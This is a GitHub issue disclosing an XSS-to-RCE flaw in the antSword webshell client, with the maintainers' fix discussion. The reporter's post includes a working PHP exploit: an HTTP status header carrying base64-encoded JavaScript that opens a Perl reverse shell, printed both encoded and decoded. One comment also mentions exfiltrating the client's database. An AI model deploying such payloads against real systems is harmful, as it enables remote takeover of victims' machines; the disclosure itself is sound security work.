Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is RCE Vulnerability in antSword #147

Closed
ev0A opened this issue Apr 11, 2019 · 6 comments

Comments

6 participants
@ev0A
Copy link

commented Apr 11, 2019

想交某VE,所以下面就用英文先写了
When i connect to my webshell by antsword.If the connection fails, antSword will echo error information.
like this
image.png
this information don't have xss protect,so i can xss and execute system command
My poc

<?php
header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

image.png
My exp (for perl)

<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>");
?>

base64_decode code

require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

getshell
image.png

~/source/modules/filemanage/index.js 206

toastr.error((err instanceof Object) ? JSON.stringify(err) : String(err), LANG_T['error']);

add xss protect

@Medicean

This comment has been minimized.

Copy link
Collaborator

commented Apr 12, 2019

感谢。为了防止插件中 toastr 出现类似问题, 修改了 toastr 可以输出 html 的特点,以后均不支持输出 html。

@rootkiter

This comment has been minimized.

Copy link

commented Apr 12, 2019

这个有点屌,RCE呀。

@ViCrack

This comment has been minimized.

Copy link

commented Apr 12, 2019

感觉这种程序架构比较容易出现xss rce遗漏,要不将任何从客户端来的的数据进行一次统一的encode过滤

@unixcs

This comment has been minimized.

Copy link

commented Apr 12, 2019

刺激

@Medicean

This comment has been minimized.

Copy link
Collaborator

commented Apr 12, 2019

@ViCrack 这个也是在输出的时候疏忽导致的,UI框架中用到的库不尽相同,比如 dhtmlx 中 grid,tree 都会在输出前编码一次,而 toastr 本就是输出 html 的,所以一刀切不是个好办法。

@Mr-xn

This comment has been minimized.

Copy link

commented Apr 15, 2019

不过 这个利用起来 需要时间竞争 话说倒是可以读取db.ant 发送到远程 全部拿走 哈哈哈哈

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.